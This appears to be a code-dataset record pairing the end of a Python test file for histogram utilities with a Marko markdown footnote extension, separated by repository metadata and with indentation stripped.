bin_centers = [0.5, 1.5, 2.5, 3.5, 4.5, 5.5, 6.5, 7.5, 8.5]
np.testing.assert_array_equal(nphist1[0], entries1)
np.testing.assert_array_equal(nphist1[1], bin_edges)
np.testing.assert_array_equal(nphist2[0], entries2)
np.testing.assert_array_equal(nphist2[1], bin_edges)
np.testing.assert_array_equal(nphist_list[0][0], entries1)
np.testing.assert_array_equal(nphist_list[0][1], bin_edges)
np.testing.assert_array_equal(nphist_list[1][0], entries2)
np.testing.assert_array_equal(nphist_list[1][1], bin_edges)
np.testing.assert_array_equal(centers, bin_centers)
def test_get_consistent_numpy_entries():
"""Test extraction of number of entries
When first making bin_edges of input histograms consistent to each other.
"""
df1 = pd.DataFrame(
{
"A": [0, 1, 2, 3, 4, 3, 2, 1, 1, 1],
"C": ["f1", "f3", "f4", "f3", "f4", "f2", "f2", "f1", "f3", "f4"],
}
)
df2 = pd.DataFrame(
{
"A": [2, 3, 4, 5, 7, 4, 6, 5, 7, 8],
"C": ["f7", "f3", "f5", "f8", "f9", "f2", "f3", "f6", "f7", "f7"],
}
)
# building 1d-, 2d-, and 3d-histogram (iteratively)
hist0 = HistogramContainer(hg.Categorize(unit("C")))
hist1 = HistogramContainer(hg.Categorize(unit("C")))
hist2 = HistogramContainer(
hg.SparselyBin(origin=0.0, binWidth=1.0, quantity=unit("A"))
)
hist3 = HistogramContainer(
hg.SparselyBin(origin=0.0, binWidth=1.0, quantity=unit("A"))
)
# fill them
for hist, df in zip([hist0, hist1, hist2, hist3], [df1, df2, df1, df2]):
hist.hist.fill.numpy(df)
e0, e1 = get_consistent_numpy_entries([hist0, hist1], get_bin_labels=False)
_, labels01 = get_consistent_numpy_entries([hist0, hist1], get_bin_labels=True)
e2, e3 = get_consistent_numpy_entries([hist2, hist3], get_bin_labels=False)
_, centers23 = get_consistent_numpy_entries([hist2, hist3], get_bin_labels=True)
entries0 = [2.0, 2.0, 3.0, 3.0, 0.0, 0.0, 0.0, 0.0, 0.0]
entries1 = [0.0, 1.0, 2.0, 0.0, 1.0, 1.0, 3.0, 1.0, 1.0]
labels = ["f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9"]
entries2 = [1.0, 4.0, 2.0, 2.0, 1.0, 0.0, 0.0, 0.0, 0.0]
entries3 = [0.0, 0.0, 1.0, 1.0, 2.0, 2.0, 1.0, 2.0, 1.0]
centers = [0.5, 1.5, 2.5, 3.5, 4.5, 5.5, 6.5, 7.5, 8.5]
np.testing.assert_array_equal(e0, entries0)
np.testing.assert_array_equal(e1, entries1)
np.testing.assert_array_equal(labels01, labels)
np.testing.assert_array_equal(e2, entries2)
np.testing.assert_array_equal(e3, entries3)
np.testing.assert_array_equal(centers23, centers)
@pytest.mark.filterwarnings("ignore:Input histograms have inconsistent")
def test_check_similar_hists():
"""Test similarity of list of histograms
Check similarity of: type, n-dim, sub-hists, specific type attributes
"""
# dummy dataset with mixed types
# convert timestamp (col D) to nanosec since 1970-1-1
df = pd.util.testing.makeMixedDataFrame()
df["date"] = df["D"].apply(to_ns)
# building 1d-, 2d-, and 3d-histogram (iteratively)
hist0 = hg.Bin(5, 0, 5, unit("A"))
hist1 = hg.Categorize(unit("C"))
hist2 = hg.Bin(5, 0, 5, unit("A"), value=hist1)
hist3 = hg.Categorize(unit("C"), value=hist0)
hist4 = hg.SparselyBin(
origin=pd.Timestamp("2009-01-01").value,
binWidth=pd.Timedelta(days=1).value,
quantity=unit("date"),
value=hist2,
)
hist5 = hg.SparselyBin(
origin=pd.Timestamp("2009-01-01").value,
binWidth=pd.Timedelta(days=1).value,
quantity=unit("date"),
value=hist3,
)
# fill them
for hist in [hist0, hist1, hist2, hist3, hist4, hist5]:
hist.fill.numpy(df)
hc0 = HistogramContainer(hist0)
hc1 = HistogramContainer(hist1)
hc2 = HistogramContainer(hist2)
hc3 = HistogramContainer(hist3)
hc4 = HistogramContainer(hist4)
hc5 = HistogramContainer(hist5)
for hc in [hc0, hc1, hc2, hc3, hc4, hc5]:
assert check_similar_hists([hc, hc])
assert not check_similar_hists([hc0, hc1])
assert not check_similar_hists([hc2, hc3])
assert not check_similar_hists([hc4, hc5])
@pytest.mark.filterwarnings("ignore:Input histograms have inconsistent")
def test_assert_similar_hists():
"""Test assert on similarity of list of histograms
Check similarity of: type, n-dim, sub-hists, specific type attributes
"""
# dummy dataset with mixed types
# convert timestamp (col D) to nanosec since 1970-1-1
df = pd.util.testing.makeMixedDataFrame()
df["date"] = df["D"].apply(to_ns)
# building 1d-, 2d-, and 3d-histogram (iteratively)
hist0 = hg.Bin(5, 0, 5, unit("A"))
hist1 = hg.Categorize(unit("C"))
hist2 = hg.Bin(5, 0, 5, unit("A"), value=hist1)
hist3 = hg.Categorize(unit("C"), value=hist0)
hist4 = hg.SparselyBin(
origin=pd.Timestamp("2009-01-01").value,
binWidth=pd.Timedelta(days=1).value,
quantity=unit("date"),
value=hist2,
)
hist5 = hg.SparselyBin(
origin=pd.Timestamp("2009-01-01").value,
binWidth=pd.Timedelta(days=1).value,
quantity=unit("date"),
value=hist3,
)
# fill them
for hist in [hist0, hist1, hist2, hist3, hist4, hist5]:
hist.fill.numpy(df)
hc0 = HistogramContainer(hist0)
hc1 = HistogramContainer(hist1)
hc2 = HistogramContainer(hist2)
hc3 = HistogramContainer(hist3)
hc4 = HistogramContainer(hist4)
hc5 = HistogramContainer(hist5)
for hc in [hc0, hc1, hc2, hc3, hc4, hc5]:
assert check_similar_hists([hc, hc])
args01 = [""]
args23 = [""]
args45 = [""]
try:
assert_similar_hists([hc0, hc1])
except ValueError as e:
args01 = e.args
try:
assert_similar_hists([hc2, hc3])
except ValueError as e:
args23 = e.args
try:
assert_similar_hists([hc4, hc5])
except ValueError as e:
args45 = e.args
assert args01[0] == "Input histograms are not all similar."
assert args23[0] == "Input histograms are not all similar."
assert args45[0] == "Input histograms are not all similar."
def test_datatype():
"""Test datatypes assigned to histograms"""
df, hc1, hc2, hc3 = get_test_histograms1()
hist1 = hc1.hist
hist2 = hc2.hist
hist3 = hc3.hist
assert hist1.datatype == str
np.testing.assert_array_equal(hist2.datatype, [np.float64, str])
np.testing.assert_array_equal(hist3.datatype, [np.datetime64, np.float64, str])
| 31.856574
| 88
| 0.597361
|
4a11350e30ab396f3e3e1f0b0244409c7ed17619
| 3,160
|
py
|
Python
|
src/tools/md2amiga/marko/ext/footnote.py
|
dMajoIT/aqb
|
7d9bc71f8bdc64a6edc49fec6815b42bb3050fda
|
[
"MIT"
] | 161
|
2018-08-20T07:42:44.000Z
|
2022-03-31T03:17:44.000Z
|
src/tools/md2amiga/marko/ext/footnote.py
|
dMajoIT/aqb
|
7d9bc71f8bdc64a6edc49fec6815b42bb3050fda
|
[
"MIT"
] | 102
|
2018-10-15T01:19:06.000Z
|
2022-03-11T13:37:00.000Z
|
src/tools/md2amiga/marko/ext/footnote.py
|
dMajoIT/aqb
|
7d9bc71f8bdc64a6edc49fec6815b42bb3050fda
|
[
"MIT"
] | 39
|
2019-04-07T08:13:01.000Z
|
2022-02-01T15:40:59.000Z
|
"""
Footnotes extension
~~~~~~~~~~~~~~~~~~~
Enable footnotes parsing and renderering in Marko.
Usage::
from marko import Markdown
text = 'Foo[^1]\\n\\n[^1]: This is a footnote.\\n'
markdown = Markdown(extensions=['footnote'])
print(markdown(text))
"""
import re
from marko import block, inline, helpers
class Document(block.Document):
def __init__(self, text):
self.footnotes = {}
super().__init__(text)
class FootnoteDef(block.BlockElement):
pattern = re.compile(r" {,3}\[\^([^\]]+)\]:[^\n\S]*(?=\S| {4})")
priority = 6
def __init__(self, match):
self.label = helpers.normalize_label(match.group(1))
self._prefix = re.escape(match.group())
self._second_prefix = r" {1,4}"
@classmethod
def match(cls, source):
return source.expect_re(cls.pattern)
@classmethod
def parse(cls, source):
state = cls(source.match)
with source.under_state(state):
state.children = block.parser.parse(source)
source.root.footnotes[state.label] = state
return state
class FootnoteRef(inline.InlineElement):
pattern = re.compile(r"\[\^([^\]]+)\]")
priority = 6
def __init__(self, match):
self.label = helpers.normalize_label(match.group(1))
@classmethod
def find(cls, text):
for match in super().find(text):
label = helpers.normalize_label(match.group(1))
if label in inline._root_node.footnotes:
yield match
class FootnoteRendererMixin:
def __init__(self):
super().__init__()
self.footnotes = []
def render_footnote_ref(self, element):
if element.label not in self.footnotes:
self.footnotes.append(element.label)
idx = self.footnotes.index(element.label) + 1
return (
'<sup class="footnote-ref" id="fnref-{lab}">'
'<a href="#fn-{lab}">{id}</a></sup>'.format(
lab=self.escape_url(element.label), id=idx
)
)
def render_footnote_def(self, element):
return ""
def _render_footnote_def(self, element):
children = self.render_children(element).rstrip()
back = f'<a href="#fnref-{element.label}" class="footnote">↩</a>'
if children.endswith("</p>"):
children = re.sub(r"</p>$", f"{back}</p>", children)
else:
children = f"{children}<p>{back}</p>\n"
return '<li id="fn-{}">\n{}</li>\n'.format(
self.escape_url(element.label), children
)
def render_document(self, element):
text = self.render_children(element)
items = [self.root_node.footnotes[label] for label in self.footnotes]
if not items:
return text
children = "".join(self._render_footnote_def(item) for item in items)
footnotes = f'<div class="footnotes">\n<ol>\n{children}</ol>\n</div>\n'
self.footnotes = []
return text + footnotes
class Footnote:
elements = [Document, FootnoteDef, FootnoteRef]
renderer_mixins = [FootnoteRendererMixin]
def make_extension():
return Footnote()
| 27.964602
| 79
| 0.596835
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.